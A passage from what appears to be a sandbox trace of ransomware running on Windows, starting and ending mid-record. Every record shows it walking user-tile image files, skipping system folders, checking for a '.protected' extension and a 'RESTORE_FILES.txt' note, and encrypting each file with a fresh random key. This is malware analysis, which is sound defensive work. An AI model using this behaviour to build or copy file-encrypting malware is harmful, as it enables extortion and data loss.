pdwDataLen=0x295eee4*=0x30) returned 1 [0071.514] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile25.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.514] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.514] lstrcmpiW (lpString1="usertile26.bmp", lpString2="Windows") returned -1 [0071.514] lstrcmpiW (lpString1="usertile26.bmp", lpString2="Program Files") returned 1 [0071.514] lstrcmpiW (lpString1="usertile26.bmp", lpString2="Program Files (x86)") returned 1 [0071.514] lstrcmpiW (lpString1="usertile26.bmp", lpString2="$Recycle.bin") returned 1 [0071.514] lstrcmpiW (lpString1="usertile26.bmp", lpString2="System Volume Information") returned 1 [0071.514] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp") returned 82 [0071.514] StrStrIW (lpFirst="usertile26.bmp", lpSrch=".protected") returned 0x0 [0071.515] lstrcmpW (lpString1="usertile26.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.515] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.515] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.515] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile26.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.519] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.519] lstrcmpiW (lpString1="usertile27.bmp", lpString2="Windows") returned -1 [0071.519] lstrcmpiW (lpString1="usertile27.bmp", lpString2="Program Files") returned 1 [0071.519] lstrcmpiW (lpString1="usertile27.bmp", lpString2="Program Files (x86)") returned 1 [0071.519] lstrcmpiW (lpString1="usertile27.bmp", lpString2="$Recycle.bin") returned 1 [0071.519] lstrcmpiW (lpString1="usertile27.bmp", lpString2="System Volume Information") returned 1 [0071.519] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp") returned 82 [0071.519] StrStrIW (lpFirst="usertile27.bmp", lpSrch=".protected") returned 0x0 [0071.519] lstrcmpW (lpString1="usertile27.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.519] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.519] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.519] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile27.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.519] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.519] lstrcmpiW (lpString1="usertile28.bmp", lpString2="Windows") returned -1 [0071.519] lstrcmpiW (lpString1="usertile28.bmp", lpString2="Program Files") returned 1 [0071.519] lstrcmpiW (lpString1="usertile28.bmp", lpString2="Program Files (x86)") returned 1 [0071.519] lstrcmpiW (lpString1="usertile28.bmp", lpString2="$Recycle.bin") returned 1 [0071.519] lstrcmpiW (lpString1="usertile28.bmp", lpString2="System Volume Information") returned 1 [0071.519] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp") returned 82 [0071.519] StrStrIW (lpFirst="usertile28.bmp", lpSrch=".protected") returned 0x0 [0071.519] lstrcmpW (lpString1="usertile28.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.519] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.520] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.520] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile28.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.520] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.520] lstrcmpiW (lpString1="usertile29.bmp", lpString2="Windows") returned -1 [0071.520] lstrcmpiW (lpString1="usertile29.bmp", lpString2="Program Files") returned 1 [0071.520] lstrcmpiW (lpString1="usertile29.bmp", lpString2="Program Files (x86)") returned 1 [0071.520] lstrcmpiW (lpString1="usertile29.bmp", lpString2="$Recycle.bin") returned 1 [0071.520] lstrcmpiW (lpString1="usertile29.bmp", lpString2="System Volume Information") returned 1 [0071.520] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp") returned 82 [0071.520] StrStrIW (lpFirst="usertile29.bmp", lpSrch=".protected") returned 0x0 [0071.520] lstrcmpW (lpString1="usertile29.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.520] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.520] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.520] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile29.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.520] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.520] lstrcmpiW (lpString1="usertile30.bmp", lpString2="Windows") returned -1 [0071.520] lstrcmpiW (lpString1="usertile30.bmp", lpString2="Program Files") returned 1 [0071.520] lstrcmpiW (lpString1="usertile30.bmp", lpString2="Program Files (x86)") returned 1 [0071.520] lstrcmpiW (lpString1="usertile30.bmp", lpString2="$Recycle.bin") returned 1 [0071.520] lstrcmpiW (lpString1="usertile30.bmp", lpString2="System Volume Information") returned 1 [0071.520] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp") returned 82 [0071.520] StrStrIW (lpFirst="usertile30.bmp", lpSrch=".protected") returned 0x0 [0071.520] lstrcmpW (lpString1="usertile30.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.520] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.520] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.520] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile30.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.521] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.521] lstrcmpiW (lpString1="usertile31.bmp", lpString2="Windows") returned -1 [0071.521] lstrcmpiW (lpString1="usertile31.bmp", lpString2="Program Files") returned 1 [0071.521] lstrcmpiW (lpString1="usertile31.bmp", lpString2="Program Files (x86)") returned 1 [0071.521] lstrcmpiW (lpString1="usertile31.bmp", lpString2="$Recycle.bin") returned 1 [0071.521] lstrcmpiW (lpString1="usertile31.bmp", lpString2="System Volume Information") returned 1 [0071.521] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp") returned 82 [0071.521] StrStrIW (lpFirst="usertile31.bmp", lpSrch=".protected") returned 0x0 [0071.521] lstrcmpW (lpString1="usertile31.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.521] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.521] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.521] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile31.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.521] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.521] lstrcmpiW (lpString1="usertile32.bmp", lpString2="Windows") returned -1 [0071.521] lstrcmpiW (lpString1="usertile32.bmp", lpString2="Program Files") returned 1 [0071.522] lstrcmpiW (lpString1="usertile32.bmp", lpString2="Program Files (x86)") returned 1 [0071.522] lstrcmpiW (lpString1="usertile32.bmp", lpString2="$Recycle.bin") returned 1 [0071.522] lstrcmpiW (lpString1="usertile32.bmp", lpString2="System Volume Information") returned 1 [0071.522] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp") returned 82 [0071.522] StrStrIW (lpFirst="usertile32.bmp", lpSrch=".protected") returned 0x0 [0071.522] lstrcmpW (lpString1="usertile32.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.522] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.522] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.522] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile32.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.522] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.522] lstrcmpiW (lpString1="usertile33.bmp", lpString2="Windows") returned -1 [0071.522] lstrcmpiW (lpString1="usertile33.bmp", lpString2="Program Files") returned 1 [0071.522] lstrcmpiW (lpString1="usertile33.bmp", lpString2="Program Files (x86)") returned 1 [0071.522] lstrcmpiW (lpString1="usertile33.bmp", lpString2="$Recycle.bin") returned 1 [0071.522] lstrcmpiW (lpString1="usertile33.bmp", lpString2="System Volume Information") returned 1 [0071.522] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp") returned 82 [0071.522] StrStrIW (lpFirst="usertile33.bmp", lpSrch=".protected") returned 0x0 [0071.522] lstrcmpW (lpString1="usertile33.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.522] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.522] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.522] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile33.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.524] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.524] lstrcmpiW (lpString1="usertile34.bmp", lpString2="Windows") returned -1 [0071.524] lstrcmpiW (lpString1="usertile34.bmp", lpString2="Program Files") returned 1 [0071.524] lstrcmpiW (lpString1="usertile34.bmp", lpString2="Program Files (x86)") returned 1 [0071.524] lstrcmpiW (lpString1="usertile34.bmp", lpString2="$Recycle.bin") returned 1 [0071.524] lstrcmpiW (lpString1="usertile34.bmp", lpString2="System Volume Information") returned 1 [0071.524] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp") returned 82 [0071.524] StrStrIW (lpFirst="usertile34.bmp", lpSrch=".protected") returned 0x0 [0071.524] lstrcmpW (lpString1="usertile34.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.524] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.524] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.524] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile34.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.528] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.528] lstrcmpiW (lpString1="usertile35.bmp", lpString2="Windows") returned -1 [0071.528] lstrcmpiW (lpString1="usertile35.bmp", lpString2="Program Files") returned 1 [0071.528] lstrcmpiW (lpString1="usertile35.bmp", lpString2="Program Files (x86)") returned 1 [0071.528] lstrcmpiW (lpString1="usertile35.bmp", lpString2="$Recycle.bin") returned 1 [0071.528] lstrcmpiW (lpString1="usertile35.bmp", lpString2="System Volume Information") returned 1 [0071.528] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp") returned 82 [0071.528] StrStrIW (lpFirst="usertile35.bmp", lpSrch=".protected") returned 0x0 [0071.528] lstrcmpW (lpString1="usertile35.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.528] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.528] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.528] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile35.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.528] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.528] lstrcmpiW (lpString1="usertile36.bmp", lpString2="Windows") returned -1 [0071.528] lstrcmpiW (lpString1="usertile36.bmp", lpString2="Program Files") returned 1 [0071.528] lstrcmpiW (lpString1="usertile36.bmp", lpString2="Program Files (x86)") returned 1 [0071.528] lstrcmpiW (lpString1="usertile36.bmp", lpString2="$Recycle.bin") returned 1 [0071.528] lstrcmpiW (lpString1="usertile36.bmp", lpString2="System Volume Information") returned 1 [0071.528] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp") returned 82 [0071.528] StrStrIW (lpFirst="usertile36.bmp", lpSrch=".protected") returned 0x0 [0071.528] lstrcmpW (lpString1="usertile36.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.528] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.528] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.528] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile36.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.528] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.528] lstrcmpiW (lpString1="usertile37.bmp", lpString2="Windows") returned -1 [0071.528] lstrcmpiW (lpString1="usertile37.bmp", lpString2="Program Files") returned 1 [0071.528] lstrcmpiW (lpString1="usertile37.bmp", lpString2="Program Files (x86)") returned 1 [0071.528] lstrcmpiW (lpString1="usertile37.bmp", lpString2="$Recycle.bin") returned 1 [0071.528] lstrcmpiW (lpString1="usertile37.bmp", lpString2="System Volume Information") returned 1 [0071.528] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp") returned 82 [0071.528] StrStrIW (lpFirst="usertile37.bmp", lpSrch=".protected") returned 0x0 [0071.528] lstrcmpW (lpString1="usertile37.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.529] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.529] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.529] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile37.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.529] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.529] lstrcmpiW (lpString1="usertile38.bmp", lpString2="Windows") returned -1 [0071.529] lstrcmpiW (lpString1="usertile38.bmp", lpString2="Program Files") returned 1 [0071.529] lstrcmpiW (lpString1="usertile38.bmp", lpString2="Program Files (x86)") returned 1 [0071.529] lstrcmpiW (lpString1="usertile38.bmp", lpString2="$Recycle.bin") returned 1 [0071.529] lstrcmpiW (lpString1="usertile38.bmp", lpString2="System Volume Information") returned 1 [0071.529] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp") returned 82 [0071.529] StrStrIW (lpFirst="usertile38.bmp", lpSrch=".protected") returned 0x0 [0071.529] lstrcmpW (lpString1="usertile38.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.529] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.529] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.529] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile38.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.531] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.531] lstrcmpiW (lpString1="usertile39.bmp", lpString2="Windows") returned -1 [0071.531] lstrcmpiW (lpString1="usertile39.bmp", lpString2="Program Files") returned 1 [0071.531] lstrcmpiW (lpString1="usertile39.bmp", lpString2="Program Files (x86)") returned 1 [0071.531] lstrcmpiW (lpString1="usertile39.bmp", lpString2="$Recycle.bin") returned 1 [0071.531] lstrcmpiW (lpString1="usertile39.bmp", lpString2="System Volume Information") returned 1 [0071.531] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp") returned 82 [0071.531] StrStrIW (lpFirst="usertile39.bmp", lpSrch=".protected") returned 0x0 [0071.531] lstrcmpW (lpString1="usertile39.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.531] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.531] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.531] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile39.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.531] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.531] lstrcmpiW (lpString1="usertile40.bmp", lpString2="Windows") returned -1 [0071.531] lstrcmpiW (lpString1="usertile40.bmp", lpString2="Program Files") returned 1 [0071.531] lstrcmpiW (lpString1="usertile40.bmp", lpString2="Program Files (x86)") returned 1 [0071.531] lstrcmpiW (lpString1="usertile40.bmp", lpString2="$Recycle.bin") returned 1 [0071.531] lstrcmpiW (lpString1="usertile40.bmp", lpString2="System Volume Information") returned 1 [0071.531] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp") returned 82 [0071.531] StrStrIW (lpFirst="usertile40.bmp", lpSrch=".protected") returned 0x0 [0071.533] lstrcmpW (lpString1="usertile40.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.533] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.533] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.533] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile40.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.533] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.533] lstrcmpiW (lpString1="usertile41.bmp", lpString2="Windows") returned -1 [0071.533] lstrcmpiW (lpString1="usertile41.bmp", lpString2="Program Files") returned 1 [0071.533] lstrcmpiW (lpString1="usertile41.bmp", lpString2="Program Files (x86)") returned 1 [0071.533] lstrcmpiW (lpString1="usertile41.bmp", lpString2="$Recycle.bin") returned 1 [0071.533] lstrcmpiW (lpString1="usertile41.bmp", lpString2="System Volume Information") returned 1 [0071.533] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp") returned 82 [0071.533] StrStrIW (lpFirst="usertile41.bmp", lpSrch=".protected") returned 0x0 [0071.533] lstrcmpW (lpString1="usertile41.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.533] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.533] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.534] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile41.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.534] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.534] 